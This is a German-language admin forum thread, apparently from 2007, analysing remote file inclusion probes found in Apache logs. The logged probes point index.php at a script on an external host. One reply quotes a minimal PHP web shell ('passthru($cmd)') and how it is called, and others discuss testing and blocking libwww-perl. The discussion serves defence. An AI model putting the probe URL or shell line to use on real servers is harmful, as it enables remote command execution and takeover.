Zugriffe von www.pecologhomes.com

Thorsten

Thorsten

SSF Facilitymanagement
Staff member
Hallo!
Folgende Zugriffe finden sich vermehrt in den Apache Logfiles:
Code: 
http://serversupportforum.de/forum/index.php?fkt=http://www.pecologhomes.com/digivendor/library/.r/stringa.txt?
Siehe Anhang.
Die dazugehörigen Scripte liegen u.a. auf Index of /digivendor/library. Etwas unwohl ist mir beim Statuscode 200. Klar, eine index.php gibt und wirk auch gefunden. Nur was macht das Script auf dem bösen Webserver damit?

mfG
Thorsten
 

Attachments

Schwer zu sagen, was das script gemacht hätte, denn es wurde vor Kurzem gelöscht...
Aber das index.php wird doch sicherlich die angegebenen Parameter sorgfältig prüfen, bevor sie verwendet werden, oder?
Zumindest ließe sich das leicht prüfen: eine Datei test.txt erstellen mit etwas php-Code (z.B. phpinfo()) drin und nach dem Schema aufrufen -- da sollte nichts von ausgeführt werden...

Viele Grüße,
LinuxAdmin
 
Hallo!
Also ich habe es mal versucht. Eines vorweg: Die meisten Seiten werden hier via vBSEO / mod_rewrite umgeschrieben (PHP -> HTML).
Unter MOD: Ungültigen Link entfernt. liegt die Textdatei. Das Impressum (impressum.php) ist eine der wenigen Seiten die nicht von vBSEO bearbeitet werden.
Ein
Code: 
...?fkt=http://.../xytest.txt?
bringt die gewünschte Seite auf den Browser und einen Logeintrag (Status Code 200) im Access Log. Mehr nicht.
Code: 
84.128.161.51 - - [16/Oct/2007:18:56:45 +0200] "GET /.../...?fkt=http://.../xytest.txt? HTTP/1.1" 200 8228 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727)"

mfG
Thorsten
 
Aber Thorsten, der Angriff geht doch auf die index.php. Also mußt Du damit auch testen. :)
Wenn mod_rewrite evtl. diese Art von CSS bereits auffängt ist es gut. Ansonsten kann man nur hoffen, daß das vBullitin-Board es tut.

Aber ich persönlich glaube eher, daß es eine Lücke in einer anderen Board-Software versucht auszunutzen.

huschi.
 
Hallo,

dummes rum gescanne nach einer fileinclusion diese gibt es in dieser Art bei vb nicht, die fkt variablen oder wie auch immer gibt es schonmal garnicht.
In der neusten Version auf jedenfall nicht und was der Angreifer haben will ist System Zugang.

aka das in eine text Datei
PHP: 
<? passthru($cmd) ?>

und cmd.txt?&cmd=commando

aber wenn ich mir den Anhang so ankucke ist das auch eher Wunsch denken von dem Scanner.

Status 200 ist klar wenn er auf index.php Zugreift und diese vorhanden ist.

mfg
the_condor
 
Ja, schade das die Scripte nicht mehr vorhanden sind. Ansonsten würde ich das gute alte libwww-perl komplett aussperren das habe ich bei meinen Servern auch so gemacht, und bisher hat sich niemand deshalb beschwert. Meistens wird libwww-perl, sowieso nur für Unfug genutzt, und selten für etwas produktives.
 
Hallo!
vBulletin war konkret wohl nicht betroffen. Ich habe jedenfalls nichts gefunden, was darauf hindeuten könnte. Ganz besonders putzig finde ich allerdings hXXp://www.pecologhomes.com/digivendor/library/authorize.php

mfG
Thorsten
 
You must log in or register to reply here.
Back
Top